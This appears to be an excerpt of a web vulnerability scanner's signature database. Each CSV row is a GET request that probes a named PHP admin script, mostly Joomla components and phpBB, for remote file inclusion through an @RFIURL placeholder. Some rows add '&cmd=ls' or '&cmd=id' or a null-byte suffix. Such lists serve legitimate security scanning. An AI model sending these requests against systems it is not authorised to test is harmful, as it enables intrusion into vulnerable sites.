"004066","5292","c","/admin.php?env_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004067","5292","c","/admin.php?lang=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004068","5292","c","/admin.php?page[path]=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004069","5292","c","/admin.php?submit=submit&form_include_template=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004070","5292","c","/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=@RFIURL?admin","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004071","5292","c","/admin/ST_countries.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004072","5292","c","/admin/ST_platforms.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004073","5292","c","/admin/addentry.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004074","5292","c","/admin/addentry.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004075","5292","c","/admin/addons/archive/archive.php?adminfolder=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004076","5292","c","/admin/admin.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004077","5292","c","/admin/admin.php?site_url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004078","5292","c","/admin/admin_forgotten_password.php?root_folder_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004079","5292","c","/admin/admin_news_bot.php?root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004080","5292","c","/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004081","5292","c","/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004082","5292","c","/admin/admin_users.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004083","5292","c","/admin/auth.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004084","5292","c","/admin/auth.php?xcart_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004085","5292","c","/admin/auth/secure.php?cfgProgDir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004086","5292","c","/admin/autoprompter.php?CONFIG[BASE_PATH]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004087","5292","c","/admin/bin/patch.php?INSTALL_FOLDER=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004088","5292","c","/admin/catagory.php?language=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004089","5292","c","/admin/classes/pear/OLE/PPS.php?homedir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004090","5292","c","/admin/classes/pear/OLE/PPS/File.php?homedir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004091","5292","c","/admin/classes/pear/OLE/PPS/Root.php?homedir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004092","5292","c","/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004093","5292","c","/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004094","5292","c","/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004095","5292","c","/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004096","5292","c","/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004097","5292","c","/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004098","5292","c","/admin/code/index.php?load_page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004099","5292","c","/admin/comment.php?config[installdir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004100","5292","c","/admin/common-menu.php?CONF[local_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004101","5292","c","/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004102","5292","c","/admin/config_settings.tpl.php?include_path=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004103","5292","c","/admin/directory.php?config[installdir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004104","5292","c","/admin/doeditconfig.php?thispath=../includes&config[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004105","5292","c","/admin/frontpage_right.php?loadadminpage=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004106","5292","c","/admin/header.php?loc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004107","5292","c","/admin/inc/add.php?format_menue=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004108","5292","c","/admin/inc/change_action.php?format_menue=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004109","5292","c","/admin/include/common.php?commonIncludePath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004110","5292","c","/admin/include/header.php?repertoire=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004111","5292","c","/admin/include/header.php?repertoire=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004112","5292","c","/admin/include/lib.module.php?mod_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004113","5292","c","/admin/includes/admin_header.php?level=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004114","5292","c","/admin/includes/admin_header.php?level=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004115","5292","c","/admin/includes/author_panel_header.php?level=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004116","5292","c","/admin/includes/author_panel_header.php?level=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004117","5292","c","/admin/includes/header.php?bypass_installed=1&secure_page_path=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004118","5292","c","/admin/includes/spaw/spaw_control.class.php?spaw_root=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004119","5292","c","/admin/index.php?path_to_script=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004120","5292","c","/admin/index.php?pg=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004121","5292","c","/admin/index.php?xtrphome=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004122","5292","c","/admin/index_sitios.php?_VIEW=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004123","5292","c","/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004124","5292","c","/admin/login.php?absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004125","5292","c","/admin/news.admin.php?path_to_script=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004126","5292","c","/admin/news.php?language=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004127","5292","c","/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004128","5292","c","/admin/sendmsg.php?config[installdir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004129","5292","c","/admin/setup/level2.php?dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004130","5292","c","/admin/system/config/conf-activation.php?site_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004131","5292","c","/admin/system/include.php?skindir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004132","5292","c","/admin/system/include.php?start=1&skindir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004133","5292","c","/admin/system/menu/item.php?site_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004134","5292","c","/admin/system/modules/conf_modules.php?site_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004135","5292","c","/admin/templates/template_thumbnail.php?thumb_template=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004136","5292","c","/admin/testing/tests/0004_init_urls.php?init_path=@RFIURL?&","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004137","5292","c","/admin/themes.php?config[installdir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004138","5292","c","/admin/tools/utf8conversion/index.php?path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004139","5292","c","/admin/user_user.php?language=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004140","5292","c","/admincp/auth/checklogin.php?cfgProgDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004141","5292","c","/admincp/auth/secure.php?cfgProgDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004142","5292","c","/adminhead.php?path[docroot]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004143","5292","c","/admini/admin.php?INC=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004144","5292","c","/admini/index.php?INC=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004145","5292","c","/administrator/admin.php?site_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004146","5292","c","/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004147","5292","c","/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004148","5292","c","/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004149","5292","c","/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004150","5292","c","/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004151","5292","c","/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004152","5292","c","/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004153","5292","c","/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004154","5292","c","/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004155","5292","c","/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004156","5292","c","/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004157","5292","c","/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004158","5292","c","/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004159","5292","c","/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004160","5292","c","/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004161","5292","c","/administrator/components/com_color/admin.color.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004162","5292","c","/administrator/components/com_color/admin.color.php?mosConfig_live_site=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004163","5292","c","/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004164","5292","c","/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004165","5292","c","/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004166","5292","c","/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004167","5292","c","/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004168","5292","c","/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004169","5292","c","/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004170","5292","c","/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004171","5292","c","/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004172","5292","c","/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004173","5292","c","/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004174","5292","c","/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004175","5292","c","/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004176","5292","c","/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004177","5292","c","/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004178","5292","c","/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004179","5292","c","/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004180","5292","c","/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004181","5292","c","/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004182","5292","c","/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004183","5292","c","/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004184","5292","c","/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004185","5292","c","/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004186","5292","c","/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004187","5292","c","/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004188","5292","c","/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004189","5292","c","/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004190","5292","c","/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004191","5292","c","/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004192","5292","c","/administrator/components/com_jreactions/langset.php?comPath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004193","5292","c","/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004194","5292","c","/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004195","5292","c","/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004196","5292","c","/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004197","5292","c","/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004198","5292","c","/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004199","5292","c","/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004200","5292","c","/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004201","5292","c","/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004202","5292","c","/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004203","5292","c","/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004204","5292","c","/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
